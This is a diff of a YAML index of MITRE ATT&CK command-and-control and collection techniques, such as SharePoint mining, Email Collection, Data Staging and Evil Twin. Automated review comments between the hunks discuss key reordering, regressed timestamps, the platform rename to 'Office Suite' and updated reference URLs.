x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.001
atomic_tests: []
T1102.001:
@@ -38870,7 +39350,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:12:30.499Z'
name: Dead Drop Resolver
description: |-
Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -38896,8 +39376,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1001.001:
technique:
@@ -38951,7 +39429,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
collection:
T1560.001:
@@ -39027,7 +39504,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560.001
atomic_tests: []
T1113:
@@ -39084,7 +39560,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1113
atomic_tests: []
T1557:
@@ -39178,7 +39653,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.001:
technique:
@@ -39257,7 +39731,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1602:
@@ -39296,7 +39769,7 @@ collection:
Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:32:58.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data from Configuration Repository
x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -39311,30 +39784,10 @@ collection:
- 'Network Traffic: Network Connection Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.002:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
- type: attack-pattern
- created: '2020-02-14T13:35:32.938Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.002
- url: https://attack.mitre.org/techniques/T1213/002
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Sharepoint
description: |
Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
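Review bot: the block of removals at the top of T1213.002 (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref`, `external_references`) is a reordering, not a deletion: the same keys with the same values are re-added at the bottom of the object in the next part of this diff, ending with `object_marking_refs` just before `atomic_tests: []`, and the identical shuffle is visible for T1025, T1074.001 and T1074.002. Since YAML mappings are unordered this is semantically a no-op, but it turns every regeneration into a large diff in which the real changes (here the `modified` update and the platform rename) are hard to find; emitting keys in a fixed order from the generator, either sorted or in the order the source bundle uses, would keep future diffs reviewable.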
@@ -39343,13 +39796,17 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: "The user access logging within Microsoft's SharePoint can
be configured to report access to certain pages and documents. (Citation:
Microsoft SharePoint Logging). As information repositories generally have
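Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted here between `kill_chain_phases` and `x_mitre_contributors`, whereas in the other objects of this patch the same key sits next to `x_mitre_modified_by_ref` near the end of the object (T1530 gets the same move to the top); a parser will not care, but it is the same key-order instability that inflates this diff and is worth fixing in the generator. Separately, the description line `* Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))` is the first Markdown link inside this bulleted block, so check once that whatever renders these descriptions into pages handles a link inside a list item.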
@@ -39363,20 +39820,37 @@ collection:
of programmatic means being used to retrieve all data within the repository.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'Cloud Service: Cloud Service Metadata'
+ type: attack-pattern
+ id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+ created: '2020-02-14T13:35:32.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/002
+ external_id: T1213.002
+ - source_name: Microsoft SharePoint Logging
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
atomic_tests: []
T1123:
technique:
- modified: '2024-01-23T22:53:18.389Z'
+ modified: '2024-10-15T13:39:22.774Z'
name: Audio Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
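Review bot: `x_mitre_permissions_required` (`- User`) is dropped from T1213.002 here, and from several other objects in this patch, with no replacement, so any reporting code or template that reads that key must now tolerate its absence. In the same hunk the platform list changes from `Windows, Office 365` to `Windows, Office Suite` and `'Cloud Service: Cloud Service Metadata'` is added as a data source; the platform rename is the change with the widest downstream effect, because anything that selects techniques by the literal string `Office 365` silently stops matching this technique, so platform-keyed indexes and filters need to learn about `Office Suite`.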
@@ -39419,7 +39893,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1123
atomic_tests: []
T1560.003:
@@ -39444,7 +39917,7 @@ collection:
description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
the Comings and Goings. Retrieved November 21, 2016.'
source_name: ESET Sednit Part 2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T22:48:14.605Z'
name: Archive via Custom Method
description: 'An adversary may compress or encrypt data that is collected prior
to exfiltration using a custom method. Adversaries may choose to use custom
@@ -39464,22 +39937,24 @@ collection:
x_mitre_data_sources:
- 'File: File Creation'
- 'Script: Script Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1114:
technique:
- modified: '2023-09-29T21:06:03.098Z'
+ modified: '2024-10-15T12:24:27.627Z'
name: Email Collection
description: 'Adversaries may target user email to collect sensitive information.
Emails may contain sensitive data, including trade secrets or personal information,
- that can prove valuable to adversaries. Adversaries can collect or forward
- email from mail servers or clients. '
+ that can prove valuable to adversaries. Emails may also contain details of
+ ongoing incident response operations, which may allow adversaries to adjust
+ their techniques in order to maintain persistence or evade defenses.(Citation:
+ TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+ can collect or forward email from mail servers or clients. '
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -39496,11 +39971,10 @@ collection:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '2.5'
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
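Review bot: both `Office 365` and `Google Workspace` are removed from T1114's `x_mitre_platforms` and only `Office Suite` is added, so a Google-Workspace-specific view of this technique can no longer be derived from the platform field alone; if a per-platform index for Google Workspace is built from `x_mitre_platforms`, it will lose T1114 (and the other techniques in this patch that get the same rename) unless `Office Suite` is mapped onto it. The version bump from `'2.5'` to `'2.6'` is consistent with the expanded description earlier in this object.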
@@ -39516,37 +39990,28 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1114
external_id: T1114
+ - source_name: CISA AA20-352A 2021
+ description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+ of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+ Retrieved August 30, 2024.
+ url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
- source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
Retrieved October 8, 2019.
url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ - source_name: TrustedSec OOB Communications
+ description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+ Out-of-Band Communications are Essential for Incident Response. Retrieved
+ August 30, 2024.'
+ url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1025:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - William Cain
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
- type: attack-pattern
- created: '2017-05-31T21:30:31.584Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1025
- external_id: T1025
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:30:50.936Z'
name: Data from Removable Media
description: "Adversaries may search connected removable media on computers
they have compromised to find files of interest. Sensitive data can be collected
@@ -39558,75 +40023,93 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - William Cain
+ x_mitre_deprecated: false
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a system's connected removable media.
Remote access tools with built-in features may interact directly with the
Windows API to gather data. Data may also be acquired through Windows system
management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
x_mitre_system_requirements:
- Privileges to access removable media drive and files
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+ created: '2017-05-31T21:30:31.584Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1025
+ external_id: T1025
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1025
atomic_tests: []
T1074.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Massimiliano Romano, BT Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
- created: '2020-03-13T21:13:10.467Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1074.001
- url: https://attack.mitre.org/techniques/T1074/001
- - source_name: Prevailion DarkWatchman 2021
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
- description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
- new evolution in fileless techniques. Retrieved January 10, 2022.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:28:39.920Z'
+ name: 'Data Staged: Local Data Staging'
description: |-
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Data Staged: Local Data Staging'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Massimiliano Romano, BT Security
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+ created: '2020-03-13T21:13:10.467Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/001
+ external_id: T1074.001
+ - source_name: Prevailion DarkWatchman 2021
+ description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+ new evolution in fileless techniques. Retrieved January 10, 2022.'
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1074.001
atomic_tests: []
T1114.001:
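Review bot: the Prevailion reference for T1074.001 now points at a Wayback Machine snapshot (`https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/`) instead of the live URL, and `modified` advances to `'2024-08-26T16:28:39.920Z'` while `x_mitre_version` stays at `'1.1'`; an archived URL with an unchanged technique version is the signature of an upstream link-rot fix rather than a content change, so nothing to act on, but it belongs in the PR description since the surrounding key reorder makes this object look rewritten. T1025 in the same hunk is the same story: `x_mitre_attack_spec_version` goes from `2.1.0` to `3.2.0` with `x_mitre_version` still `'1.2'`, a metadata-only refresh.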
@@ -39653,7 +40136,7 @@ collection:
url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
.ost). Retrieved February 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T17:59:20.983Z'
name: 'Email Collection: Local Email Collection'
description: |-
Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -39677,13 +40160,11 @@ collection:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1114.001
atomic_tests: []
T1119:
technique:
- modified: '2024-01-02T13:35:57.680Z'
+ modified: '2024-09-25T20:40:07.791Z'
name: Automated Collection
description: "Once established within a system or network, an adversary may
use automated techniques for collecting internal data. Methods for performing
@@ -39704,6 +40185,7 @@ collection:
phase_name: collection
x_mitre_contributors:
- Praetorian
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Depending on the method used, actions could include common
file system commands and parameters on the command-line interface within batch
@@ -39727,8 +40209,10 @@ collection:
- Windows
- IaaS
- SaaS
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
+ - 'User Account: User Account Authentication'
- 'Command: Command Execution'
- 'File: File Access'
- 'Script: Script Execution'
@@ -39753,7 +40237,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1119
atomic_tests: []
T1115:
@@ -39820,12 +40303,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1115
atomic_tests: []
T1530:
technique:
- modified: '2023-09-29T16:11:43.530Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Data from Cloud Storage Object
description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -39859,10 +40341,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Netskope
- Praetorian
- AppOmni
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
service. Activity originating from unexpected sources may indicate improper
@@ -39873,13 +40357,14 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Metadata'
- 'Cloud Storage: Cloud Storage Access'
type: attack-pattern
id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -39920,37 +40405,11 @@ collection:
url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1530
atomic_tests: []
T1074.002:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
- type: attack-pattern
- created: '2020-03-13T21:14:58.206Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1074.002
- url: https://attack.mitre.org/techniques/T1074/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Remote Data Staging
description: |-
Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -39961,23 +40420,47 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Creation'
- 'Command: Command Execution'
- 'File: File Access'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+ created: '2020-03-13T21:14:58.206Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/002
+ external_id: T1074.002
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:54:39.466Z'
name: Data from Local System
description: |
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -40047,7 +40530,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1005
atomic_tests: []
T1560.002:
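Review bot: the Mandiant M-Trends 2020 reference URL changes from `https://content.fireeye.com/m-trends/rpt-m-trends-2020` to `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf` with `source_name` and `description` unchanged, which is fine, but `modified` for T1005 at the end of this hunk goes backwards from `'2023-05-09T14:00:00.188Z'` to `'2023-04-12T23:54:39.466Z'`, so the regressed timestamps in this patch are not confined to the 2020/2021-era objects; confirm the source bundle version before merging, and if the generator is reading a collection-level timestamp for some objects and the object's own `modified` for others, that is the bug to fix.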
@@ -40082,7 +40564,7 @@ collection:
description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
April 22, 2016.
source_name: Wikipedia File Header Signatures
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T18:27:30.891Z'
name: 'Archive Collected Data: Archive via Library'
description: |-
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -40101,10 +40583,89 @@ collection:
x_mitre_data_sources:
- 'Script: Script Execution'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1560.002
atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
